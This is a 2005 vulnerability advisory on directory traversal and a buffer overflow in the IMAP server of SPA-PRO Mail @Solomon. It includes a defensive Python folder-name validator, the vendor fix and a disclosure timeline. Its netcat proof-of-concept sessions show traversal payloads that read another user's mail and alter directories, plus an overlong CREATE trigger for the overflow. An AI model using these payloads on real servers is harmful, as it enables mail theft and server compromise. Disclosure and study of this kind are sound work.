by Tan Chew Keong
Release Date: 02 Jun 2005
Japanese Version
SPA-PRO Mail @Solomon is a stable, high-speed mail server that supports multiple domains. It is low cost, easy to set up,
and has a lower maintenance cost than comparable products. It is best suited for use as a departmental mail server, in
medium-sized enterprises, in educational institutes, and by hosting companies.
A directory traversal vulnerability was found in the IMAP service of SPA-PRO Mail @Solomon. This vulnerability may be exploited
by a malicious user to view other users' email, create arbitrary directories on the server, delete empty directories
on the server, and/or rename directories on the server. A buffer overflow vulnerability also exists. It is triggered when
the IMAP service receives an overly long folder name in the CREATE command, and may be exploited to crash the IMAP service
or to execute arbitrary code.
Tested system: SPA-PRO Mail @Solomon Version 4.00 (SPA-IMAP4S 4.01) on Japanese Win2K SP4.
This advisory documents two vulnerabilities found in the IMAP server of SPA-PRO Mail @Solomon. The first is a directory
traversal vulnerability. The second is a buffer overflow vulnerability.
1. Multiple Commands Directory Traversal Vulnerability.
In the default installation of SPA-PRO Mail @Solomon, the users' IMAP folders are stored in subdirectories under C:\mail\.
SPA-PRO Mail @Solomon fails to sanitize received IMAP folder names that contain directory traversal sequences, using either
the forward-slash or the back-slash character as separator. Several IMAP commands are affected, including SELECT, CREATE,
DELETE and RENAME. A malicious user may exploit this in a directory traversal attack to view other users' email,
create arbitrary directories on the server, delete empty directories on the server, and/or rename directories on the server.
This is illustrated in the session below (the text after "//" is commentary, not part of the protocol exchange).
C:\>nc 192.168.2.102 143
* OK SPA-PRO IMAP4rev1 Server @Solomon (4.01) Ready. Licence will be expired in 30 days.
1 login "testuser2" "testuser2" // login as testuser2
1 OK login completed
2 select "../testuser/inbox" // selected testuser's inbox
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] Message 1 is first unseen
* OK [UIDVALIDITY 893984814] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Deleted \Seen \*)] Limited
2 OK [READ-WRITE] select completed
3 uid fetch 1:* (flags)
* 1 FETCH (FLAGS (\Recent) UID 1)
3 OK fetch completed
4 uid fetch 1 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // retrieve testuser's email
* 1 FETCH (UID 1 RFC822.SIZE 620 FLAGS (\Recent) BODY[] {620}
Received: from [192.168.2.101] (unverified [192.168.2.101]) by 2xeuqvc4h7yysw5
(SPA-PRO ESMTP Receiver @Solomon (4.07)) with ESMTP id <B0000000001@2xeuqvc4h7yysw5>;
Sat, 28 May 2005 12:45:06 +0800
Message-ID: <4297F754.8060305@security.org.sg>
Date: Sat, 28 May 2005 12:45:08 +0800
From: Chew Keong TAN
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: testuser@xxxxx
Subject: This is test subject
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
This is a test email.
)
4 OK fetch completed
5 create "../../../../../hacked" // create directory in C:\
5 OK create completed
6 rename "../../../../../hacked" "../../../../../hacked2" // rename directory in C:\
6 OK rename successful
7 delete "../../../../../hacked2" // delete directory in C:\
7 OK delete successful
8 select "..\testuser\inbox" // Using back-slash works too.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] Message 1 is first unseen
* OK [UIDVALIDITY 893984814] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Deleted \Seen \*)] Limited
8 OK [READ-WRITE] select completed
2. Create Command Buffer Overflow Vulnerability.
A buffer overflow is triggered when the IMAP service receives an overly long folder name in the CREATE command.
This may be exploited to crash the IMAP service or to execute arbitrary code. A sample command that triggers the
overflow is shown below. The exact folder-name length that triggers the overflow depends on the length of the mail
directory name and the length of the user name.
C:\>nc 192.168.2.102 143
* OK SPA-PRO IMAP4rev1 Server @Solomon (4.01) Ready. Licence will be expired in 30 days.
1 login "testuser" "testuser"
1 OK login completed
2 create "AAAABBBBCCCCDDDDEEEEFFFF...[Approx 260 bytes]..."
CRASH...
An OllyDbg screen capture (image not reproduced in this text) showed the overwritten EIP. On our test system, we were able to exploit this
vulnerability to execute bindshell shellcode.
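The check a fixed server needs for both issues above, as an added example that is not SPA-PRO's code: it resolves an IMAP folder name against the user's directory under C:\mail\, treating both slash forms shown in section 1 as separators (the early vendor builds sanitized only one form), and caps the resulting on-disk path length before it reaches any fixed-size buffer. The 260-character cap is an assumed bound (Windows MAX_PATH), not a value from the vendor.

```python
from pathlib import PureWindowsPath

MAIL_ROOT = r"C:\mail"   # default mail store named in the advisory
MAX_PATH = 260           # assumed bound for the server's path buffer


class BadMailboxName(ValueError):
    """Raised for any folder name that must not be passed to the filesystem."""


def mailbox_path(user: str, folder: str) -> str:
    """Return the on-disk path for an IMAP folder name, or raise BadMailboxName."""
    if not folder or "\x00" in folder:
        raise BadMailboxName("empty name or NUL byte")
    # Treat "/" and "\" alike: the advisory shows both forms escaping the mailbox.
    parts = folder.replace("\\", "/").split("/")
    # A leading separator or a drive/stream colon would leave C:\mail\<user>\.
    if parts[0] == "" or any(":" in p for p in parts):
        raise BadMailboxName("absolute path or drive/stream specifier")
    for p in parts:
        if p in ("", ".", ".."):
            raise BadMailboxName("traversal component: %r" % p)
    user_root = PureWindowsPath(MAIL_ROOT, user)
    full = user_root.joinpath(*parts)
    # Independent proof that the result is still inside the user's own mailbox.
    if user_root not in full.parents:
        raise BadMailboxName("escapes user mailbox")
    # Length is bounded here, so no later fixed-size buffer can overflow.
    if len(str(full)) >= MAX_PATH:
        raise BadMailboxName("path too long")
    return str(full)


def is_safe(user: str, folder: str) -> bool:
    """True if mailbox_path() accepts the folder name."""
    try:
        mailbox_path(user, folder)
        return True
    except BadMailboxName:
        return False


if __name__ == "__main__":
    # Constructed inputs: the folder names from the sessions above plus benign ones.
    for name in ["inbox", "Sent/2005", "../testuser/inbox", "..\\testuser\\inbox",
                 "../../../../../hacked", "A" * 260]:
        print("%-28r -> %s" % (name[:24], "accepted" if is_safe("testuser2", name) else "rejected"))
```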
- Upgrade the SPA-IMAP4S component of SPA-PRO Mail @Solomon to version 4.05.
27 May 05 - Vulnerability Discovered.
28 May 05 - Initial Vendor Notification.
28 May 05 - Initial Vendor Reply.
29 May 05 - Sent Vulnerability Report to Vendor.
30 May 05 - Re-sent Vulnerability Report to Vendor.
30 May 05 - Vendor Provided SPA-IMAP4S Version 4.03 for Testing.
31 May 05 - Informed Vendor that Directory Traversal Vulnerability is not Fully Fixed and Informed Vendor of Buffer Overflow Vulnerability.
31 May 05 - Vendor Provided SPA-IMAP4S Version 4.04 for Testing.
31 May 05 - Informed Vendor that Directory Traversal Vulnerability is still not Fully Fixed.
31 May 05 - Vendor Provided SPA-IMAP4S Version 4.05, which fixes the vulnerability.
02 Jun 05 - Public Release.
For further questions and enquiries, email the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg